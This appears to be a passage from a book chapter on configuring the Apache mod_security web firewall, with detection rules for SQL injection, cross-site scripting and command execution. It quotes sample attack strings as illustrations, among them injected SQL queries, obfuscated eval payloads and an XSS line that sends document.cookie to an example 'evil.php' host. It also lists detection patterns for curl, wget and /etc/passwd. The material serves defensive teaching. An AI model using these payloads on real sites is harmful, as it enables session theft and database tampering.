# Require the Host header field to be present.
SecFilterSelective HTTP_Host ^$
   
# Require explicit and known content encodings for methods
# other than GET or HEAD. The multipart/form-data encoding
# should not be allowed at all if the application does not
# make use of file upload. There are many automated attacks
# out there that are using wrong encoding names.
SecFilterSelective REQUEST_METHOD !^(GET|HEAD)$ chain
SecFilterSelective HTTP_Content-Type \
!(^application/x-www-form-urlencoded$|^multipart/form-data;)
   
# Require Content-Length to be provided with
# every POST request. Length is a requirement for
# request body filtering to work.
SecFilterSelective REQUEST_METHOD ^POST$ chain
SecFilterSelective HTTP_Content-Length ^$
   
# Don't accept transfer encodings we know we don't handle
# (you probably don't need them anyway).
SecFilterSelective HTTP_Transfer-Encoding !^$

You may also choose to add some of the following rules to warn you of requests that do not seem to be from common browsers. Rules such as these are suited for applications where the only interaction is expected to come from users using browsers. On a public web site, where many different types of user agents are active, they result in too many warnings.

# Most requests performed manually (e.g., using telnet or nc)
# will lack one of the following headers.
# (Accept-Encoding and Accept-Language are also good
# candidates for monitoring since popular browsers
# always use them.)
SecFilterSelective HTTP_User-Agent|HTTP_Connection|HTTP_Accept ^$ log,pass
   
# Catch common nonbrowser user agents.
SecFilterSelective HTTP_User-Agent \
(libwhisker|paros|wget|libwww|perl|curl) log,pass

Ironically, your own monitoring tools are likely to generate error log warnings. If you have a dedicated IP address from which you perform monitoring, you can add a rule to skip the warning checks for all requests coming from it. Put the following rule just above the rules that produce warnings:

# Allow requests coming from 192.168.254.125
SecFilterSelective REMOTE_ADDR ^192.168.254.125$ allow

Though you could place this rule on the top of the rule set, that is a bad idea; as one of the basic security principles says, only establish minimal trust.

Detecting Common Attacks

Web IDSs are good at enforcing strict protocol usage and defending against known application problems. Attempts to exploit common web application problems often have a recognizable footprint. Pattern matching can be used to detect some attacks but it is generally impossible to catch all of them without having too many false positives. Because of this, my advice is to use detection only when dealing with common web application attacks. There is another reason to adopt this approach: since it is not possible to have a foolproof defense against a determined attacker, having a tight protection scheme will force such an attacker to adopt and use evasion methods you have not prepared for. If that happens, the attacker will become invisible to you. Let some attacks through so you are aware of what is happening.

The biggest obstacle to reliable detection is the ability for users to enter free-form text, and this is common in web applications. Consequently, content management systems are the most difficult ones to defend. (Users may even be discussing web application security in a forum!) When users are allowed to enter arbitrary text, they will sooner or later attempt to enter something that looks like an attack.

In this section, I will discuss potentially useful regular expression patterns without going into details as to how they are to be added to the mod_security configuration since the method of adding patterns to rules has been described. (If you are not familiar with common web application attacks, reread Chapter 10.) In addition to the patterns provided here, you can seek inspiration in rules others have created for nonweb IDSs. (For example, rules for Snort, a popular NIDS, can be found at http://www.snort.org and http://www.bleedingsnort.com.)

Database attacks

Database attacks are executed by sneaking an SQL query or a part of it into request parameters. Attack detection must, therefore, attempt to detect commonly used SQL keywords and metacharacters. Table 12-4 shows a set of patterns that can be used to detect database attacks.

Table 12-4. Patterns to detect SQL injection attacks

Pattern	Query example
`delete[[:space:]]+from`	`DELETE FROM users`
`drop[[:space:]]+table`	`DROP TABLE users`
`create[[:space:]]+table`	`CREATE TABLE newusers`
`update.+set.+=`	`UPDATE users SET balance = 1000`
`insert[[:space:]]+into.+values`	`INSERT INTO users VALUES (1`, ’`admin')`
`select.+from`	`SELECT username, balance FROM` `users`
`union.+select`	Appends to an existing query: `... UNION` `ALL SELECT username FROM users`
`or.+1[[:space:]]*= [[:space:]]1`	Attempt to modify the original query to always be true: `SELECT * FROM users WHERE` `username = 'admin' and password = 'xxx``' OR 1=1--`’
’`.+--`	Attempt to escape out of a string and inject a query, and then comment out the rest of the original query: `SELECT * FROM users` `WHERE username = 'admin``' OR` `username= 'guest' --`’

Note

SQL injection attacks are a work of trial and error. It is almost impossible to execute a successful attack on the first try. It is more likely the attacker will make errors as he learns about database layout table contents. Each error will cause an SQL query somewhere to fail, in turn causing the script to fail, too. Watching for failed queries in the application log will make SQL injection attack detection a reality. If the application was not designed to log such problems, it may still be possible to use output buffering to detect them (using patterns to look for error messages) and log them into the web server error log.

So far, I have presented generic SQL patterns. Most databases have proprietary extensions of one kind or another, which require keywords that are often easier to detect. These patterns differ from one database to another, so creating a good set of detection rules requires expertise in the deployed database. Table 12-5 shows some interesting patterns for MSSQL and MySQL.

Table 12-5. Database-specific detection patterns

Pattern	Attack
`exec.+xp_`	MSSQL. Attempt to execute an extended stored procedure: `EXEC xp_cmdshell`.
`exec.+sp_`	MSSQL. Attempt to execute a stored procedure: `EXEC sp_who`.
`@@[[:alnum:]]+`	MSSQL. Access to an internal variable: `SELECT` `@@version`.
`into[[:space:]]+outfile`	MySQL. Attempt to write contents of a table to disk: `SELECT * FROM '/tmp/users`’.
`load[[:space:]]+data`	MySQL. Attempt to load a file from disk: `LOAD` `DATA INFILE '/tmp/users' INTO TABLE users`.

Cross-site scripting attacks

Cross-site scripting (XSS) attacks can be difficult to detect when launched by those who know how to evade detection systems. If the entry point is in the HTML, the attacker must find a way to change from HTML and into something more dangerous. Danger comes from JavaScript, ActiveX components, Flash programs, or other embedded objects. The following list of problematic HTML tags is by no means exhaustive, but it will prove the point:

<object>...</object>: Executes component when page is loaded (IE only)
<embed>...</embed>: Executes component when page is loaded
<applet>...</applet>: Executes applet when page is loaded
<script>...</script>: Executes code when page is loaded
<script src="..."></script>: Executes code when page is loaded
<iframe src="...">: Executes code when page is loaded
<img src="javascript:...">: Executes code when page is loaded
<b onMouseOver="...">: Executes code when mouse pointer covers the bold text
&{...};: Executes code when page is loaded (Netscape only)

Your best bet is to try to detect any HTML in the parameters and also the special JavaScript entity syntax that only works in Netscape. If a broad pattern such as <.+> is too broad for you, you may want to list all possible tag names and detect them. But if the attacker can sneak in a tag, then detection becomes increasingly difficult because of many evasion techniques that can be used. From the following two evasion examples, you can see it is easy to obfuscate a string to make detection practically impossible:

<img src="javascript:...">
<img src="javasXcript:..."> (X is any of the whitespace characters except space)

If the attacker can inject content directly into JavaScript, the list of evasion options is even longer. For example, he can use the eval( ) function to execute an arbitrary string or the document.write() function to output HTML into the document:

document.write('<img src="http://www.example.com/evil.php?’ + document.cookie + ’">')
eval('alert(document.cookie)')
eval('al' + 'ert' + '(docu' + 'ment' + '.' + 'co' + 'ok' + 'ie)')
eval('\x61\x6C\x65\x72\x74\x28\x64\x6F\x63\x75\x6D\x65’ + ’\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x29')

Now you understand why you should not stop attackers too early. Knowing you are being attacked, even successfully attacked, is sometimes better than not knowing at all. A useful collection list of warning patterns for XSS attacks is given in Table 12-6. (I call them warning patterns because you probably do not want to automatically reject requests with such patterns.) They are not foolproof but cast a wide net to catch potential abuse. You may have to refine it over time to reduce false positives for your particular application.

Table 12-6. XSS attack warning patterns

`&#[[0-9a-fA-F]]{2}`	`eval[[:space:]]*(`	`onKeyUp`
`\x5cx[0-9a-fA-F]{2}`	`fromCharCode`	`onLoad`
`<.+>`	`http-equiv`	`onMouseDown`
`<applet`	`javascript`:	`onMouseOut`
`<div`	`onAbort`	`onMouseOver`
`<embed`	`onBlur`	`onMouseUp`
`<iframe`	`onChange`	`onMove`
`<img`	`onClick`	`onReset`
`<meta`	`onDblClick`	`onResize`
`<object`	`onDragDrop`	`onSelect`
`<script`	`onError`	`onSubmit`
`document.cookie`	`onFocus`	`onUnload`
`document.write`	`onKeyDown`	`style[[:space:]]*=`
`dynsrc`	`onKeyPress`	`vbscript`:

Command execution and file disclosure

Detecting command execution and file disclosure attacks in the input data can be difficult. The commands are often very short and can appear as normal words in many request parameters. The recommended course of action is to implement a set of patterns to detect but not reject requests. Table 12-7 shows patterns that can be of use. (I have combined many patterns into one to save space.) The patterns in the table are too broad and should never be used to reject requests automatically.

Table 12-7. Command execution and file disclosure detection patterns

Pattern	Description
`(uname\|id\|ls\|cat\|rm\|kill\|mail)`	Common Unix commands
`(/home/\|/var/\|/boot/\|/etc/\|/bin/\|/usr/\|/tmp/)`	Fragments of common Unix system path
`../`	Directory backreference commonly used as part of file disclosure attacks

Command execution and file disclosure attacks are often easier to detect in the output. On my system, the first line of /etc/passwd contains “root:x:0:0:root:/root:/bin/bash,” and this is the file any attacker is likely to examine. A pattern such as root:x:0:0:root is likely to work here. Similarly, the output of the id command looks like this:

uid=506(ivanr) gid=506(ivanr) groups=506(ivanr)

A pattern such as uid=[[:digit:]]+$[[:alnum:]]+$ gid=\[[:digit:]]$[[:alnum:]]+$ will catch its use by looking at the output.

Advanced Topics

I conclude this chapter with a few advanced topics. These topics are regularly the subject of email messages I get about mod_security on the users’ mailing list.

Complex configuration scenarios

The mod_security configuration data can be placed into any Apache context. This means you can configure it in the main server, virtual hosts, directories, locations, and file matches. It can even work in the .htaccess files context. Whenever a subcontext is created, it automatically inherits the configuration and all the rules from the parent context. Suppose you have the following:

SecFilterSelective ARG_p KEYWORD
<Location /moresecure/>
    SecFilterSelective ARG_q KEYWORD
</Location>

Requests for the parent configuration will have only parameter p tested, while the requests that fall in the /moresecure/ location will have p and q tested (in that order). This makes it easy to add more protection. If you need less protection, you can choose not to inherit any of the rules from the parent context. You do this with the SecFilterInheritance directive. For example, suppose you have:

SecFilterSelective ARG_p KEYWORD
<Location /moresecure/>
    SecFilterInheritance Off
    SecFilterSelective ARG_q KEYWORD
</Location>

Requests for the parent configuration will have only parameter p tested, while the requests that fall in the /moresecure/ location will have only parameter q tested. The SecFilterInheritance directive affects only rule inheritance. The rest of the configuration is still inherited, but you can use the configuration directives to change configuration at will.

Byte-range restriction

Byte-range restriction is a special type of protection that aims to reduce the possibility of a full range of bytes in the request parameters. Such protection can be effective against buffer overflow attacks against vulnerable binaries. The built-in protection, if used, will validate that every variable used in a rule conforms to the range specified with the SecFilterForceByteRange directive. Applications built for an English-speaking audience will probably use a part of the ASCII set. Restricting all bytes to have values from 32 to 126 will not prevent normal functionality:

SecFilterForceByteRange 32 126

However, many applications do need to allow 0x0a and 0x0d bytes (line feed and carriage return, respectfully) because these characters are used in free-form fields (ones with a <textarea> tag). Though you can relax the range slightly to allow byte values from 10 on up, I am often asked whether it is possible to have more than one range. The SecFilterForceByteRange directive does not yet support that, but you could perform such a check with a rule that sits at the beginning of the rule set.

SecFilterSelective ARGS !^[\x0a\x0d\x20-\x7e]*$

The previous rule allows characters 0x0a, 0x0d, and a range from 0x20 (32) to 0x7e (126).

File upload interception and validation

Since mod_security understands the multipart/form-data encoding used for file uploads, it can extract the uploaded files from the request and store them for future reference. In a way, this is a form of audit logging (see Chapter 8). mod_security offers another exciting feature: validation of uploaded files in real time. All you need is a script designed to take the full path to the file as its first and only parameter and to enable file validation functionality in mod_security:

SecUploadApproveScript /usr/local/apache/bin/upload_verify.pl

The script will be invoked for every file upload attempt. If the script returns 1 as the first character of the first line of its output, the file will be accepted. If it returns anything else, the whole request will be rejected. It is useful to have the error message (if any) on the same line after the first character as it will be printed in the mod_security log. File upload validation can be used for several purposes:

To inspect uploaded files for viruses or other types of attack
To allow only files of certain types (e.g., images)
To inspect and validate file content

If you have the excellent open source antivirus program Clam AntiVirus (http://www.clamav.net) installed, then you can use the following utility script as an interface:

#!/usr/bin/perl
   
$CLAMSCAN = "/usr/bin/clamscan";
   
if (@ARGV != 1) {
    print "Usage: modsec-clamscan.pl <filename>\n";
    exit;
}
   
my ($FILE) = @ARGV;
   
$cmd = "$CLAMSCAN --stdout --disable-summary $FILE";
$input = `$cmd`;
$input =~ m/^(.+)/;
$error_message = $1;
   
$output = "0 Unable to parse clamscan output";
   
if ($error_message =~ m/: Empty file\.$/) {
    $output = "1 empty file";
}
elsif ($error_message =~ m/: (.+) ERROR$/) {
    $output = "0 clamscan: $1";
}
elsif ($error_message =~ m/: (.+) FOUND$/) {
    $output = "0 clamscan: $1";
}
elsif ($error_message =~ m/: OK$/) {
    $output = "1 clamscan: OK";
}
   
print "$output\n";

Restricting mod_security to process dynamic requests only

When mod_security operates from within Apache (as opposed to working as a network gateway), it can obtain more information about requests. One useful bit of information is the choice of a module to handle the request (called a handler). In the early phases of request processing, Apache will look for candidate modules to handle the request, usually by looking at the extension of the targeted file. If a handler is not found, the request is probably for a static file (e.g., an image). Otherwise, the handler will probably process the file in some way (for example, executing the script in the case of PHP) and dynamically create a response. Since mod_security mostly serves the purpose of protecting dynamic resources, this information can be used to perform optimization. If you configure the SecFilterEngine directive with the DynamicOnly parameter then mod_security will act only on those requests that have a handler attached to them.

# Only process dynamic requests
SecFilterEngine DynamicOnly

Unfortunately, it is possible to configure Apache to serve dynamic content and have the handler undefined, by misusing its AddType directive. Even the official PHP installation guide recommends this approach. If that happens, mod_security will not be able to determine which requests are truly dynamic and will not be able to protect them. The correct approach is to use the AddHandler directive, as in this example for PHP:

AddHandler application/x-httpd-php .php

Relying on the existence of a request handler to decide whether to protect a resource can be rewarding, but since it can be dangerous if handlers are not configured correctly, check if relying on handlers really works in your case. You can do this by having a rule that rejects every request (in which case it will be obvious whether mod_security works) or by looking at what mod_security writes to the debug log (where it will state if it believes the incoming request is for a static resource).

Warning

When mod_security works as part of a network gateway, it cannot determine if the request is for a static resource. In that case, the DynamicOnly option does not make any sense and should not be used.

Request body monitoring

There are two ways to control request body buffering and monitoring. You have seen one in the default configuration where the SecFilterScanPOST directive was used. This works if you know in advance where you want and do not want buffering to take place. Using the Apache context directives, you can turn off buffering for some parts of the site, as in the following example:

# Turn off POST buffering for
# scripts in this location
<Location /nobuffering/>
    SecFilterScanPOST Off
</Location>

Sometimes you need to disable buffering on a per-request basis, based on some request attribute. This is possible. If mod_security detects that the MODSEC_NOPOSTBUFFERING environment variable is defined, it will not read in the request body. The environment variable can be defined with the help of the mod_setenvif module and its SetEnvIf directive:

# Disable request body buffering for all file uploads
SetEnvIfNoCase Content-Type ^multipart/form-data \ 
"MODSEC_NOPOSTBUFFERING=Do not buffer file uploads"

The text you assign to the variable will appear in the debug log, to make it clear why the request body was not buffered. Turning off buffering like this can result in removing protection from your scripts. If the attacker finds out how to disable request body buffering, he may be able to do so for every script and then use the POST method for all attacks.

Response body monitoring

Response body monitoring is supported in the Apache 2 version of mod_security and can prevent information leak or detect signs of intrusion. This type of filtering needs to be enabled first because it is off by default:

# Enable output filtering
SecFilterScanOutput On
# Restrict output filtering to text-based pages
SecFilterOutputMimeTypes "(null) text/plain text/html"

It is important to restrict filtering using MIME types to avoid binary resources, such as images, from being buffered and analyzed. The SecFilterSelective keyword is used against the OUTPUT variable to monitor response bodies. The following example watches pages for PHP errors:

SecFilterSelective OUTPUT "Fatal Error:"

Using a trick conceived by Ryan C. Barnett (some of whose work is available at https://sourceforge.net/users/rcbarnett/), output monitoring can be used as a form of integrity monitoring to detect and protect against defacement attacks. Attackers performing defacement usually replace the complete home page with their content. To fight this, Ryan embeds a unique keyword into every page and creates an output filtering rule that only allows the page to be sent if it contains the keyword.

SecFilterSelective OUTPUT !KEYWORD

This is not recommended for most applications due to its organizational overhead and potential for errors, but it can work well in a few high-profile cases.

Deploying positive security model protection

Though most of this chapter used negative security model protection for examples, you can deploy mod_security in a positive security model configuration. A positive security model relies on identifying requests that are safe instead of looking for dangerous content. In the following example, I will demonstrate how this approach can be used by showing the configuration for two application scripts. For each script, the standard Apache container directive <Location> is used to enclose mod_security rules that will only be applied to that script. The use of the SecFilterSelective directive to specify rules has previously been described.

<Location /user_view.php>
    # This script only accepts GET
    SecFilterSelective REQUEST_METHOD !^GET$
    # Accept only one parameter: id
    SecFilterSelective ARGS_NAMES !^id$
    # Parameter id is mandatory, and it must be
    # a number, 4-14 digits long
    SecFilterSelective ARG_id !^[[:digit:]]{4,14}$
</Location>
   
<Location /user_add.php>
    # This script only accepts POST
    SecFilterSelective REQUEST_METHOD !^POST$
    # Accept three parameters: firstname, lastname, and email
    SecFilterSelective ARGS_NAMES !^(firstname|lastname|email)$
    # Parameter firstname is mandatory, and it must
    # contain text 1-64 characters long
    SecFilterSelective ARG_firstname !^[[:alnum:][:space:]]{1,64}$
    # Parameter lastname is mandatory, and it must
    # contain text 1-64 characters long
    SecFilterSelective ARG_lastname !^[ [:alnum:][:space:]]{1,64}$
    # Parameter email is optional, but if it is present
    # it must consist only of characters that are
    # allowed in an email address 
    SecFilterSelective ARG_email !(^$|^[[:alnum:].@]{1,64}$)
</Location>

There is a small drawback to this configuration approach. To determine which <Location> block is applicable for a request, Apache has to look through all such directives present. For applications with a small number of scripts, this will not be a problem, but it may present a performance problem for applications with hundreds of scripts, each of which need a <Location> block.

A feature to allow user-defined types (predefined regular expressions), such as one present in mod_parmguard (see the sidebar), would significantly ease the task of writing configuration data.

mod_parmguard

There is an Apache module, mod_parmguard (http://www.trickytools.com/php/mod_parmguard.php), which is close to providing a complete solution to positive security model requirements. When I checked Version 1.3, the module was not stable for production use, but you should check on it from time to time to see if it improves.

Its configuration is XML-based and, for this purpose, easier to use than Apache-style configuration typical for other modules. Here’s a short excerpt from its documentation for a page with a single parameter:

<url>
    <match>validate.php</match>
    <parm name="name">
      <type name="string"/>
      <attr name="maxlen" value="10"/>
      <attr name="charclass" value="^[a-zA-Z]+$"/>
    </parm>
</url>

Other interesting features of this module include a spider that analyzes the application and produces configuration data automatically and the ability to generate custom data types and save time writing the configuration.